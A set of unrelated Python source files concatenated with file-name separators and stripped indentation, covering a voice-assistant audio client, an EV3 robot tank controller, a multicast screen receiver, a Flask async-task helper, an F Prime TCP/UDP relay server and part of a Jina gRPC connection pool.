:return: The anypubsub object used for receiving Eva messages.
:rtype: anypubsub.backends.MongoPubSub
"""
global ARGS
uri = 'mongodb://'
if len(ARGS.mongo_username) > 0:
uri = uri + ARGS.mongo_username
if len(ARGS.mongo_password) > 0: uri = uri + ':' + ARGS.mongo_password + '@'
else: uri = uri + '@'
uri = '%s%s:%s' %(uri, ARGS.mongo_host, ARGS.mongo_port)
client = MongoClient(uri)
return create_pubsub_from_settings({'backend': 'mongodb',
'client': client,
'database': 'eva',
'collection': 'communications'})
def consume_messages(queue):
"""
The worker function that is spawned in the :func:`start_consumer` function.
Will do the work in listening for pubsub messages from Eva and playing
the audio responses.
:param queue: The pubsub message queue to subscribe to.
:type queue: string
"""
# Need to listen for messages and play audio ones to the user.
pubsub = get_pubsub()
subscriber = pubsub.subscribe(queue)
# Subscriber will continuously tail the mongodb collection queue.
for message in subscriber:
if message is not None:
if isinstance(message, dict) and \
'output_audio' in message and \
message['output_audio'] is not None:
audio_data = message['output_audio']['audio']
f = open('/tmp/eva_audio', 'wb')
f.write(audio_data)
f.close()
play('/tmp/eva_audio', message['output_audio']['content_type'])
time.sleep(0.1)
def main():
"""
Parses client configuration options, starts the consumers, and starts
listening for keyword.
The keyword specified needs to be configured in respeaker (the keyword must
be available in the pocketsphinx configuration for dictionary.txt and
keywords.txt).
"""
parser = argparse.ArgumentParser()
parser.add_argument("--keyword", help="Keyword to listen for - only works if configured in dictionary.txt and keywords.txt", default='eva')
parser.add_argument("--snowboy-model", help="Alternatively specify a Snowboy model instead of using Pocketsphinx for keyword detection")
parser.add_argument("--eva-host", help="Eva server hostname or IP", default='localhost')
parser.add_argument("--audio-port", help="Port that Eva is listening for Audio", default=8800)
parser.add_argument("--mongo-host", help="MongoDB hostname or IP (typically same as Eva)", default='localhost')
parser.add_argument("--mongo-port", help="MongoDB port", default=27017)
parser.add_argument("--mongo-username", help="MongoDB username", default='')
parser.add_argument("--mongo-password", help="MongoDB password", default='')
global ARGS
ARGS = parser.parse_args()
# Start the message consumers.
start_consumer('eva_messages')
start_consumer('eva_responses')
# Ready listening thread.
quit_event = Event()
thread = Thread(target=listen, args=(quit_event,))
thread.start()
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
quit_event.set()
break
thread.join()
if __name__ == '__main__':
main()
|
04-tank-switchable.py
|
#!/usr/bin/env python3
# Functionality:
# IR channel 0: normal tank
# IR channel 1: fast tank
# IR channel 2: slow tank
# backspace -> exit
# down -> toggle color saying
# up -> follow the current color
import math
import logging
import threading
import signal
import time
import ev3dev.ev3 as ev3
import sys
from ev3dev.auto import OUTPUT_A, OUTPUT_B, OUTPUT_C, OUTPUT_D
from ev3dev.helper import MediumMotor
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(levelname)5s: %(message)s')
log = logging.getLogger(__name__)
log.info("Starting TRACK3RWithPen")
silent = True
class Tank(object):
def __init__(self, left_motor, right_motor, polarity='inversed', name='Tank',
speed_sp=400):
self.left_motor = ev3.LargeMotor(left_motor)
self.right_motor = ev3.LargeMotor(right_motor)
for x in (self.left_motor, self.right_motor):
if not x.connected:
log.error("%s is not connected" % x)
sys.exit(1)
self.left_motor.reset()
self.right_motor.reset()
self.speed_sp = speed_sp
self.left_motor.speed_sp = self.speed_sp
self.right_motor.speed_sp = self.speed_sp
self.set_polarity(polarity)
self.name = name
log.info("Created Tank object "+name+" for speed "+str(self.speed_sp))
def __str__(self):
return self.name
def set_polarity(self, polarity):
valid_choices = ('normal', 'inversed')
assert polarity in valid_choices,\
"%s is an invalid polarity choice, must be %s" % (polarity, ', '.join(valid_choices))
self.left_motor.polarity = polarity
self.right_motor.polarity = polarity
class RemoteControlledTank(Tank):
def __init__(self, left_motor, right_motor, polarity='inversed', channel=1, speed_sp=400):
Tank.__init__(self, left_motor, right_motor, polarity, speed_sp=speed_sp)
log.info("Getting remote control for channel "+str(channel))
self.remote = ev3.RemoteControl(channel=channel)
if not self.remote.connected:
log.error("%s is not connected" % self.remote)
sys.exit(1)
self.remote.on_red_up = self.make_move(self.left_motor, self.speed_sp)
self.remote.on_red_down = self.make_move(self.left_motor, self.speed_sp * -1)
self.remote.on_blue_up = self.make_move(self.right_motor, self.speed_sp)
self.remote.on_blue_down = self.make_move(self.right_motor, self.speed_sp * -1)
def make_move(self, motor, dc_sp):
def move(state):
if state:
motor.run_forever(speed_sp=dc_sp)
else:
motor.stop()
return move
def process(self):
self.remote.process()
def main(self, done):
try:
while not done.is_set():
self.remote.process()
time.sleep(0.01)
# Exit cleanly so that all motors are stopped
except (KeyboardInterrupt, Exception) as e:
log.exception(e)
for motor in ev3.list_motors():
motor.stop()
class TRACK3R(RemoteControlledTank):
"""
Base class for all TRACK3R variations. The only difference in the child
classes are in how the medium motor is handled.
To enable the medium motor toggle the beacon button on the EV3 remote.
"""
def __init__(self, medium_motor, left_motor, right_motor, speed_sp=400, channel=1):
RemoteControlledTank.__init__(self, left_motor, right_motor, speed_sp=speed_sp, channel=channel)
self.medium_motor = MediumMotor(medium_motor)
if not self.medium_motor.connected:
log.error("%s is not connected" % self.medium_motor)
sys.exit(1)
self.medium_motor.reset()
class TRACK3RWithPen(TRACK3R):
def __init__(self, medium_motor=OUTPUT_A, left_motor=OUTPUT_B, right_motor=OUTPUT_C, speed_sp=400, channel=1):
TRACK3R.__init__(self, medium_motor, left_motor, right_motor, speed_sp=speed_sp, channel=channel)
self.remote.on_beacon = self.move_pen
self.pen_down = True
def move_pen(self, state):
print("Current pen state:", self.pen_down)
if self.pen_down:
self.medium_motor.run_to_rel_pos(speed_sp=200, position_sp=-75, stop_action="hold")
else:
self.medium_motor.run_to_rel_pos(speed_sp=200, position_sp=75, stop_action="hold")
self.pen_down = not self.pen_down
def touch_leds(done):
"""
This is the second thread of execution. It will constantly poll the
touch button and change leds
"""
ts = ev3.TouchSensor()
while not done.is_set():
ev3.Leds.set_color(ev3.Leds.LEFT, (ev3.Leds.GREEN, ev3.Leds.RED)[ts.value()])
def play_leds(self):
from ev3dev.ev3 import Leds
# save current state
saved_state = [led.brightness_pct for led in Leds.LEFT + Leds.RIGHT]
Leds.all_off()
time.sleep(0.1)
# continuous mix of colors
print('colors fade')
for i in range(180):
rd = math.radians(10 * i)
Leds.red_left.brightness_pct = .5 * (1 + math.cos(rd))
Leds.green_left.brightness_pct = .5 * (1 + math.sin(rd))
Leds.red_right.brightness_pct = .5 * (1 + math.sin(rd))
Leds.green_right.brightness_pct = .5 * (1 + math.cos(rd))
time.sleep(0.05)
Leds.all_off()
time.sleep(0.5)
for led, level in zip(Leds.RIGHT + Leds.LEFT, saved_state) :
led.brightness_pct = level
def toggle_event(evt):
if evt.is_set():
log.info("toggling off")
evt.clear()
else:
log.info("toggling on")
evt.set()
def button_watcher(done):
"""
This will respond to buttons pressed
"""
bt = ev3.Button()
log.info("Configuring buttons:")
# the horrifying lambda-if-not-x-else-true runs play_leds upon button release
bt.on_up = lambda x: play_leds if not x else True
log.info(" up: play_leds")
bt.on_backspace = lambda x: done.set() if not x else True
log.info(" esc: exit")
bt.on_down = lambda x: toggle_event(color_speaker_on) if not x else True
# toggle operation of color speaker
log.info(" down: speak colors")
while not done.is_set():
bt.process()
time.sleep(0.5)
def color_speaker(done, color_speaker_on):
"""
This will poll color and say its name if changed.
"""
while not done.is_set():
log.info("color_speaker ready")
color_speaker_on.wait() # wait until someone launches us
log.info("color_speaker starting")
cl = ev3.ColorSensor()
assert cl.connected, "Connect a color sensor to any sensor port"
cl.mode='COL-COLOR'
colors=('unknown','black','blue','green','yellow','red','white','brown')
lastcolor=0
while color_speaker_on.is_set() and not done.is_set():
thiscolor = cl.value()
if thiscolor != lastcolor:
lastcolor = thiscolor
if thiscolor:
print(colors[thiscolor])
ev3.Sound.speak("This is "+colors[thiscolor]+".").wait()
time.sleep(0.5)
log.info("color_speaker stopping")
# The 'done' event will be used to signal the threads to stop:
done = threading.Event()
# global switches
color_speaker_on = threading.Event()
# We also need to catch SIGINT (keyboard interrup) and SIGTERM (termination
# signal from brickman) and exit gracefully:
def signal_handler(signal, frame):
done.set()
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
trackerBasic = TRACK3RWithPen()
trackerFast = TRACK3RWithPen(channel=2, speed_sp=800)
trackerSlow = TRACK3RWithPen(channel=3, speed_sp=200)
# Now that we have the worker functions defined, lets run those in separate
# threads.
#touchthread = threading.Thread(target=touch_leds, args=(done,))
colorthread = threading.Thread(target=color_speaker, args=(done, color_speaker_on))
buttonthread = threading.Thread(target=button_watcher, args=(done,))
#touchthread.start()
colorthread.start()
buttonthread.start()
log.info("Started TRACK3RWithPen")
if not silent: ev3.Sound.speak("I'm ready!")
#trackerBasic.main(done)
# our custom loop processing all speeds:
try:
while not done.is_set():
trackerBasic.process()
trackerFast.process()
trackerSlow.process()
time.sleep(0.01)
# Exit cleanly so that all motors are stopped
except (KeyboardInterrupt, Exception) as e:
log.exception(e)
done.set()
for motor in ev3.list_motors():
motor.stop()
# hopefully it will be sufficient to start one
if not silent: ev3.Sound.speak("Exiting!")
log.info("Exiting TRACK3RWithPen")
# release all threads to let them stop
color_speaker_on.set()
done.set()
#touchthread.join()
colorthread.join()
buttonthread.join()
|
ScreenBroadcast.py
|
from PyQt5.QtCore import QObject
from PyQt5.QtGui import QImage, QPixmap
from Module.Packages import ScreenBroadcastFlag
import socket
import struct
import zlib
from threading import Thread, Lock
from queue import Queue
import logging
class ScreenBroadcast(QObject):
def __init__(self, parent, current_ip, socket_ip, socket_port, socket_buffer):
super(ScreenBroadcast, self).__init__()
self.parent = parent
self.current_ip = current_ip
self.socket_ip = socket_ip
self.socket_port = socket_port
self.socket_buffer = socket_buffer
self.frames_queue = Queue()
self.working = False
self.__init_socket_obj()
def __init_socket_obj(self):
self.socket_obj = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
self.socket_obj.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
self.socket_obj.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket_obj.bind(('', self.socket_port))
self.socket_obj.setsockopt(
socket.IPPROTO_IP,
socket.IP_ADD_MEMBERSHIP,
socket.inet_aton(self.socket_ip) + socket.inet_aton(self.current_ip)
)
def __recieve_thread(self):
header_size = struct.calcsize('!4i')
payload_size = self.socket_buffer - struct.calcsize('!2i')
frame_data = b''
pack_drop_flag = False
pack_drop_buffer = b''
while self.working:
try:
if not pack_drop_flag:
socket_data, _ = self.socket_obj.recvfrom(header_size)
else:
socket_data = pack_drop_buffer
pack_drop_flag = False
pack_drop_buffer = b''
data_flag, data_index, data_length, data_rounds = struct.unpack('!4i', socket_data)
if data_flag == ScreenBroadcastFlag.PackInfo:
while len(frame_data) < data_length:
socket_data, _ = self.socket_obj.recvfrom(self.socket_buffer)
data_flag, pack_length, pack = struct.unpack(f'!2i{payload_size}s', socket_data)
pack = pack[:pack_length]
if data_flag == ScreenBroadcastFlag.PackData:
frame_data += pack
elif data_flag == ScreenBroadcastFlag.PackInfo:
pack_drop_flag = True
pack_drop_buffer = socket_data
break
if pack_drop_flag:
continue
elif len(frame_data) == data_length:
frame = zlib.decompress(frame_data)
self.frames_queue.put(frame)
frame_data = b''
elif len(frame_data) > data_length:
frame_data = b''
except (OSError, struct.error):
continue
except Exception as e:
logging.warning(f'Failed to handle frame: {e}')
def start(self):
Thread(target=self.__recieve_thread, daemon=True).start()
while self.working:
frame_raw = self.frames_queue.get()
frame_qimage = QImage.fromData(frame_raw)
self.parent.frame_recieved.emit(QPixmap.fromImage(frame_qimage))
|
tasks.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2016 Miguel Grinberg <miguelgrinberg50@gmail.com>
#
# Distributed under terms of the MIT license.
import threading
import time
import uuid
from datetime import datetime
from flask import current_app, request
from flask_restful import Resource
from functools import wraps
tasks = {}
def before_first_request():
def clean_old_tasks():
global tasks
while True:
# Only keep tasks that are running or that finished less than 5 minutes ago.
five_min_ago = datetime.timestamp(datetime.utcnow()) - 5 * 60
tasks = {
task_id: task
for task_id, task in tasks.items()
if 'timestamp' not in task or task['timestamp'] > five_min_ago
}
time.sleep(60)
thread = threading.Thread(target=clean_old_tasks)
thread.start()
def async_api(f):
@wraps(f)
def wrapped(*args, **kwargs):
def task(flask_app, environ):
# Create a request context similar to that of the original request
with flask_app.request_context(environ):
try:
tasks[task_id]['response'] = f(*args, **kwargs)
except Exception as e:
tasks[task_id]['response'] = {
'err': 'Task failed',
'msg': str(e)
}, 500
if current_app.debug:
raise e
finally:
tasks[task_id]['timestamp'] = datetime.timestamp(datetime.utcnow())
task_id = uuid.uuid4().hex
tasks[task_id] = {
'task': threading.Thread(
target=task,
args=(current_app._get_current_object(), request.environ)
)
}
tasks[task_id]['task'].start()
# Return a 202 response, with a link that the client can use to obtain task status
return {'msg': 'Task started', 'task_id': task_id}, 202
return wrapped
class TaskResource(Resource):
def get(self, task_id):
"""
Return status about an asynchronous task. If this request returns a 202
status code, it means that task hasn't finished yet. Else, the response
from the task is returned.
"""
task = tasks.get(task_id)
if task is None:
return {'err': 'Task not found'}, 404
if 'response' not in task:
return {'msg': 'Task is still running'}, 202
return task['response']
|
tcpserver.py
|
#!/usr/bin/env python3
import errno
import os
import signal
import socket
import struct
import sys
import threading
import time
from optparse import OptionParser
from fprime.constants import DATA_ENCODING
try:
import socketserver
except ImportError:
import SocketServer as socketserver
__version__ = 0.1
__date__ = "2015-04-03"
__updated__ = "2016-04-07"
# Universal server id global
SERVER = None
LOCK = None
shutdown_event = threading.Event()
FSW_clients = []
GUI_clients = []
FSW_ids = []
GUI_ids = []
def signal_handler(*_):
print("Ctrl-C received, server shutting down.")
shutdown_event.set()
def now():
return time.ctime(time.time())
class ThreadedTCPRequestHandler(socketserver.StreamRequestHandler):
"""
Derived from original Stable demo during R&TD and adapted
for use in new FSW gse.py application.
TCP socket server for commands, log events, and telemetry data.
Later this will handle other things such as sequence files and parameters.
Handle is instanced in own thread for each client.
Registration is done by sending the string "Register <name>".
Sending a message to destination <name> is done as
"A5A5 <name> <data>" Note only <data> is sent.
Any client that sends a "List" comment makes the server display all
registered clients.
"""
socketserver.StreamRequestHandler.allow_reuse_address = True
socketserver.StreamRequestHandler.timeout = 1
def handle(self): # on each client connect
"""
The function that is invoked upon a new client. This function listens
for data on the socket. Packets for now are assumed to be separated
by a newline. For each packet, call processPkt.
"""
self.partial = b""
self.cmdQueue = []
self.registered = False
self.name = b""
self.id = 0
# print self.client_address, now() # show this client's address
# Read the data from the socket
data = self.recv(13)
# Connection was closed by the client
if not data:
print("Client exited.")
return
else:
# Process the data into the cmdQueue
self.getCmds(data)
# Process the cmdQueue
self.processQueue()
if self.registered:
print("Registration complete waiting for message.")
self.getNewMsg()
else:
print("Unable to register client.")
return
LOCK.acquire()
del SERVER.dest_obj[self.name]
if self.name in FSW_clients:
FSW_clients.remove(self.name)
FSW_ids.remove(self.id)
elif self.name in GUI_clients:
GUI_clients.remove(self.name)
GUI_ids.remove(self.id)
LOCK.release()
print("Closed %s connection." % self.name.decode(DATA_ENCODING))
self.registered = False
self.request.close()
def getCmds(self, inputString, end_of_command=b"\n"):
"""
Build a command from partial or full socket input
"""
commands = inputString.split(end_of_command)
if len(self.partial):
commands[0] = self.partial + commands[0]
self.partial = b""
if len(commands[-1]):
self.partial = commands[-1]
self.cmdQueue.extend(commands[:-1])
else:
self.cmdQueue.extend(commands[:-1])
def processQueue(self):
for cmd in self.cmdQueue:
self.processRegistration(cmd)
self.cmdQueue = []
def processRegistration(self, cmd):
params = cmd.split()
process_id = 0
if params[0] == b"Register":
LOCK.acquire()
name = params[1]
if b"FSW" in name:
if FSW_clients:
process_id = sorted(FSW_ids)[-1] + 1
name = params[1] + b"_" + bytes(process_id)
FSW_clients.append(name)
FSW_ids.append(process_id)
elif b"GUI" in name:
if GUI_clients:
process_id = sorted(GUI_ids)[-1] + 1
name = params[1] + b"_" + bytes(process_id)
GUI_clients.append(name)
GUI_ids.append(process_id)
SERVER.dest_obj[name] = DestObj(name, self.request)
LOCK.release()
self.registered = True
self.name = name
self.id = process_id
print("Registered client " + self.name.decode(DATA_ENCODING))
#################################################
# New Routines to process the command messages
#################################################
def getNewMsg(self):
"""
After registration wait for an incoming message
The first part must always be an "A5A5 " or a "List "
"""
# Loop while the connected client has packets to send/receive
while not shutdown_event.is_set():
# Read the header data from the socket either A5A5 or List
header = self.readHeader()
# If the received header is an empty string, connection closed, exit loop
if not header:
break
elif header == b"Quit":
LOCK.acquire()
print("Quit received!")
SERVER.dest_obj[self.name].put(struct.pack(">I", 0xA5A5A5A5))
shutdown_event.set()
time.sleep(1)
print("Quit processed!")
SERVER.shutdown()
SERVER.server_close()
LOCK.release()
break
# Got the header data so read the data of the message here...
data = self.readData(header)
# Process and send the packet of the message here...
self.processNewPkt(header, data)
def recv(self, l):
"""
Read l bytes from socket.
"""
chunk = b""
msg = b""
n = 0
while l > n:
try:
chunk = self.request.recv(l - n)
if chunk == b"":
print("read data from socket is empty!")
return b""
msg = msg + chunk
n = len(msg)
except socket.timeout:
if shutdown_event.is_set():
print("socket timed out and shutdown is requested")
return b"Quit\n"
continue
except OSError as err:
if err.errno == errno.ECONNRESET:
print(
"Socket error "
+ str(err.errno)
+ " (Connection reset by peer) occurred on recv()."
)
else:
print("Socket error " + str(err.errno) + " occurred on recv().")
return msg
def readHeader(self):
"""
Read the 9 byte header (e.g. "A5A5 GUI " or "A5A5 FSW "),
or just read the "List\n" command.
"""
header = self.recv(5)
if len(header) == 0:
print(
"Header information is empty, client "
+ self.name.decode(DATA_ENCODING)
+ " exiting."
)
return header
if header == b"List\n":
return b"List"
elif header == b"Quit\n":
return b"Quit"
elif header[:-1] == b"A5A5":
header2 = self.recv(4)
return header + header2
else:
return
def readData(self, header):
"""
Read the data part of the message sent to either GUI or FSW.
GUI receives telemetry.
FSW receives commands of various lengths.
"""
data = b""
if header == b"List":
return b""
elif header == b"Quit":
return b""
dst = header.split(b" ")[1].strip(b" ")
if dst == b"FSW":
# Read variable length command data here...
desc = self.recv(4)
sizeb = self.recv(4)
size = struct.unpack(">I", sizeb)[0]
data = desc + sizeb + self.recv(size)
elif dst == b"GUI":
# Read telemetry data here...
tlm_packet_size = self.recv(4)
size = struct.unpack(">I", tlm_packet_size)[0]
data = tlm_packet_size + self.recv(size)
else:
raise RuntimeError("unrecognized client %s" % dst.decode(DATA_ENCODING))
return data
def processNewPkt(self, header, data):
"""
Process a single command here header and data here.
The command must always start with A5A5 except if it is a List.
Once the entire header tstring is processed send it on queue.
If something goes wrong report and shutdown server.
"""
dest_list = []
if header == b"List":
print("List of registered clients: ")
LOCK.acquire()
for d in list(SERVER.dest_obj.keys()):
print("\t" + SERVER.dest_obj[d].name.decode(DATA_ENCODING))
reg_client_str = b"List " + SERVER.dest_obj[d].name
l = len(reg_client_str)
reg_client_str = struct.pack("i%ds" % l, l, reg_client_str)
self.request.send(reg_client_str)
LOCK.release()
return 0
# Process data here...
head, dst = header.strip(b" ").split(b" ")
if head == b"A5A5": # Packet Header
# print "Received Packet: %s %s...\n" % (head,dst)
if data == b"":
print(" Data is empty, returning.")
if b"GUI" in dst:
dest_list = GUI_clients
elif b"FSW" in dst:
dest_list = FSW_clients
for dest_elem in dest_list:
# print "Locking TCP"
LOCK.acquire()
if dest_elem in list(SERVER.dest_obj.keys()):
# Send the message here....
# print "Sending TCP msg to ", dest_elem
SERVER.dest_obj[dest_elem].put(data)
LOCK.release()
else:
raise RuntimeError("Packet missing A5A5 header")
class ThreadedUDPRequestHandler(socketserver.BaseRequestHandler):
"""
Derived from original Stable demo during R&TD and adapted
for use in new FSW gse.py application.
TCP socket server for commands, log events, and telemetry data.
Later this will handle other things such as sequence files and parameters.
Handle is instanced in own thread for each client.
Registration is done by sending the string "Register <name>".
Sending a message to destination <name> is done as
"A5A5 <name> <data>" Note only <data> is sent.
Any client that sends a "List" comment makes the server display all
registered clients.
"""
socketserver.BaseRequestHandler.allow_reuse_address = True
def handle(self): # on each packet
"""
The function that is invoked when a packet is received. This function listens
for data on the socket. Packets for now are assumed to be separated
by a newline. For each packet, call processPkt.
"""
self.getNewMsg(self.request[0])
#################################################
# New Routines to process the command messages
#################################################
def getNewMsg(self, packet):
"""
After registration wait for an incoming message
The first part must always be an "A5A5 " or a "List "
"""
# Read the header data from the socket either A5A5 or List
(header, packet) = self.readHeader(packet)
# If the received header is an empty string, connection closed, exit loop
if not header:
return
# Got the header data so read the data of the message here...
data = self.readData(header, packet)
# Process and send the packet of the message here...
self.processNewPkt(header, data)
def readHeader(self, packet):
"""
Read the 9 byte header (e.g. "A5A5 GUI " or "A5A5 FSW "),
or just read the "List\n" command.
"""
header = packet[:4]
header2 = packet[4:9]
packet = packet[9:]
return (header + header2, packet)
def readData(self, header, packet):
"""
Read the data part of the message sent to either GUI or FSW.
GUI receives telemetry.
FSW receives commands of various lengths.
"""
data = ""
header.split(b" ")[1].strip(b" ")
# Read telemetry data here...
tlm_packet_size = packet[:4]
size = struct.unpack(">I", tlm_packet_size)[0]
data = tlm_packet_size + packet[4 : 4 + size]
return data
def processNewPkt(self, header, data):
"""
Process a single command here header and data here.
The command must always start with A5A5 except if it is a List.
Once the entire header string is processed send it on queue.
If something goes wrong report and shutdown server.
"""
dest_list = []
# Process data here...
head, dst = header.strip(b" ").split(b" ")
if head == b"A5A5": # Packet Header
# print "Received Packet: %s %s...\n" % (head,dst)
if data == "":
print(" Data is empty, returning.")
if b"GUI" in dst:
dest_list = GUI_clients
else:
print("dest? %s" % dst.decode(DATA_ENCODING))
for dest_elem in dest_list:
LOCK.acquire()
if dest_elem in list(SERVER.dest_obj.keys()):
# Send the message here....
# print "Sending UDP msg to ", dest_elem
SERVER.dest_obj[dest_elem].put(data)
LOCK.release()
else:
raise RuntimeError("Telemetry missing A5A5 header")
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
"""
TCP Socket server.
Keep a dictionary of destination objects containing queues and
socket id's for writing to destinations.
"""
dest_obj = dict()
lock_obj = threading.Lock()
class ThreadedUDPServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
"""
UDP Socket server.
"""
class DestObj:
"""
Destination object for all clients registered.
"""
def __init__(self, name, request):
"""
Constructor
"""
self.name = name
self.socket = request
self.packet = b""
def put(self, msg):
"""
Write out the message to the destination socket
"""
try:
# print "about to send data to " + self.name
self.socket.send(msg)
except OSError as err:
print("Socket error " + str(err.errno) + " occurred on send().")
def fileno(self):
""""""
return self.socket
def main(argv=None):
global SERVER, LOCK
program_name = os.path.basename(sys.argv[0])
program_license = "Copyright 2015 user_name (California Institute of Technology) \
ALL RIGHTS RESERVED. U.S. Government Sponsorship acknowledged."
program_version = "v0.1"
program_build_date = "%s" % __updated__
program_version_string = "%prog {} ({})".format(program_version, program_build_date)
program_longdesc = (
"""""" # optional - give further explanation about what the program does
)
if argv is None:
argv = sys.argv[1:]
try:
parser = OptionParser(
version=program_version_string,
epilog=program_longdesc,
description=program_license,
)
parser.add_option(
"-p",
"--port",
dest="port",
action="store",
type="int",
help="Set threaded tcp socket server port [default: %default]",
default=50007,
)
parser.add_option(
"-i",
"--host",
dest="host",
action="store",
type="string",
help="Set threaded tcp socket server ip [default: %default]",
default="127.0.0.1",
)
# process options
(opts, args) = parser.parse_args(argv)
HOST = opts.host
PORT = opts.port
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
udp_server = ThreadedUDPServer((HOST, PORT), ThreadedUDPRequestHandler)
# Hopefully this will allow address reuse and server to restart immediately
server.allow_reuse_address = True
SERVER = server
LOCK = server.lock_obj
print("TCP Socket Server listening on host addr {}, port {}".format(HOST, PORT))
# Start a thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target=server.serve_forever)
udp_server_thread = threading.Thread(target=udp_server.serve_forever)
signal.signal(signal.SIGINT, signal_handler)
server_thread.daemon = False
server_thread.start()
udp_server_thread.daemon = False
udp_server_thread.start()
while not shutdown_event.is_set():
server_thread.join(timeout=5.0)
udp_server_thread.join(timeout=5.0)
print("shutdown from main thread")
SERVER.shutdown()
SERVER.server_close()
udp_server.shutdown()
udp_server.server_close()
time.sleep(1)
except Exception as e:
indent = len(program_name) * " "
sys.stderr.write(program_name + ": " + repr(e) + "\n")
sys.stderr.write(indent + " for help use --help\n")
return 2
if __name__ == "__main__":
sys.exit(main())
|
networking.py
|
import ast
import asyncio
import ipaddress
import socket
from abc import abstractmethod
from argparse import Namespace
from threading import Thread
from typing import Optional
import grpc
from jina.logging.logger import JinaLogger
from jina.proto import jina_pb2_grpc
from jina.types.message import Message
from .. import __default_host__, __docker_host__
from ..helper import get_public_ip, get_internal_ip, get_or_reuse_loop
if False:
import kubernetes
class ConnectionList:
"""
Maintains a list of connections and uses round roubin for selecting a connection
:param port: port to use for the connections
"""
def __init__(self, port: int):
self.port = port
self._connections = []
self._address_to_connection_idx = {}
self._rr_counter = 0
def add_connection(self, address: str, connection):
"""
Add connection with ip to the connection list
:param address: Target address of this connection
:param connection: The connection to add
"""
if address not in self._address_to_connection_idx:
self._address_to_connection_idx[address] = len(self._connections)
self._connections.append(connection)
def remove_connection(self, address: str):
"""
Remove connection with ip from the connection list
:param address: Remove connection for this address
:returns: The removed connection or None if there was not any for the given ip
"""
if address in self._address_to_connection_idx:
return self._connections.pop(self._address_to_connection_idx.pop(address))
return None
def get_next_connection(self):
"""
Returns a connection from the list. Strategy is round robin
:returns: A connection from the pool
"""
connection = self._connections[self._rr_counter]
self._rr_counter = (self._rr_counter + 1) % len(self._connections)
return connection
def pop_connection(self):
"""
Removes and returns a connection from the list. Strategy is round robin
:returns: The connection removed from the pool
"""
if self._connections:
connection = self._connections.pop(self._rr_counter)
self._rr_counter = (
(self._rr_counter + 1) % len(self._connections)
if len(self._connections)
else 0
)
return connection
else:
return None
def has_connection(self, address: str) -> bool:
"""
Checks if a connection for ip exists in the list
:param address: The address to check
:returns: True if a connection for the ip exists in the list
"""
return address in self._address_to_connection_idx
class ConnectionPool:
"""
Manages a list of connections.
:param logger: the logger to use
:param on_demand_connection: Flag to indicate if connections should be created on demand
"""
def __init__(self, logger: Optional[JinaLogger] = None, on_demand_connection=True):
self._connections = {}
self._on_demand_connection = on_demand_connection
self._logger = logger or JinaLogger(self.__class__.__name__)
def send_message(self, msg: Message, target_address: str):
"""Send msg to target_address via one of the pooled connections
:param msg: message to send
:param target_address: address to send to, should include the port like 1.1.1.1:53
:return: result of the actual send method
"""
if target_address in self._connections:
pooled_connection = self._connections[target_address].get_next_connection()
return self._send_message(msg, pooled_connection)
elif self._on_demand_connection:
# If the pool is disabled and an unknown connection is requested: create it
connection_pool = self._create_connection_pool(target_address)
return self._send_message(msg, connection_pool.get_next_connection())
else:
raise ValueError(f'Unknown address {target_address}')
def _create_connection_pool(self, target_address):
port = target_address[target_address.rfind(':') + 1 :]
connection_pool = ConnectionList(port=port)
connection_pool.add_connection(
target_address, self._create_connection(target=target_address)
)
self._connections[target_address] = connection_pool
return connection_pool
def start(self):
"""
Starts the connection pool
"""
pass
def close(self):
"""
Closes the connection pool
"""
self._connections.clear()
@abstractmethod
def _send_message(self, msg: Message, connection):
...
@abstractmethod
def _create_connection(self, target):
...
class GrpcConnectionPool(ConnectionPool):
"""
GrpcConnectionPool which uses gRPC as the communication mechanism
"""
def _send_message(self, msg: Message, connection):
# this wraps the awaitable object from grpc as a coroutine so it can be used as a task
# the grpc call function is not a coroutine but some _AioCall
async def task_wrapper(new_message, stub):
await stub.Call(new_message)
return asyncio.create_task(task_wrapper(msg, connection))
def _create_connection(self, target):
self._logger.debug(f'create connection to {target}')
channel = grpc.aio.insecure_channel(
target,
options=[
('grpc.max_send_message_length', -1),
('grpc.max_receive_message_length', -1),
],
)
return jina_pb2_grpc.JinaDataRequestRPCStub(channel)
class K8sGrpcConnectionPool(GrpcConnectionPool):
"""
Manages grpc connections to replicas in a K8s deployment.
:param namespace: K8s namespace to operate in
:param client: K8s client
:param logger: the logger to use
"""
def __init__(
self,
namespace: str,
client: 'kubernetes.client.CoreV1Api',
logger: JinaLogger = None,
):
super().__init__(logger=logger, on_demand_connection=False)
self._namespace = namespace
self._deployment_clusteraddresses = {}
self._k8s_client = client
self._k8s_event_queue = asyncio.Queue()
self.enabled = False
self._fetch_initial_state()
from kubernetes import watch
self._api_watch = watch.Watch()
self.update_thread = Thread(target=self.run, daemon=True)
def _fetch_initial_state(self):
namespaced_pods = self._k8s_client.list_namespaced_pod(self._namespace)
for item in namespaced_pods.items:
self._process_item(item)
def start(self):
"""
Subscribe to the K8s API and watch for changes in Pods
"""
self._loop = get_or_reuse_loop()
self._process_events_task = asyncio.create_task(self._process_events())
self.update_thread.start()
async def _process_events(self):
while self.enabled:
event = await self._k8s_event_queue.get()
self._process_item(event)
def run(self):
"""
Subscribes on MODIFIED events from list_namespaced_pod AK8s PI
"""
self.enabled = True
while self.enabled:
for event in self._api_watch.stream(
self._k8s_client.list_namespaced_pod, self._namespace
):
if event['type'] == 'MODIFIED':
asyncio.run_coroutine_threadsafe(
self._k8s_event_queue.put(event['object']), self._loop
)
if not self.enabled:
break
def close(self):
"""
Closes the connection pool
"""
self.enabled = False
self._process_events_task.cancel()
self._api_watch.stop()
super().close()
def send_message(self, msg: Message, target_address: str):
"""
Send msg to target_address via one of the pooled connections.
:param msg: message to send
:param target_address: address to send to, should include the port like 1.1.1.1:53
:return: result of the actual send method
"""
host, port = target_address.split(':')
# host can be a domain instead of IP Address, resolve it to IP Address
return super().send_message(msg, f'{socket.gethostbyname(host)}:{port}')
@staticmethod
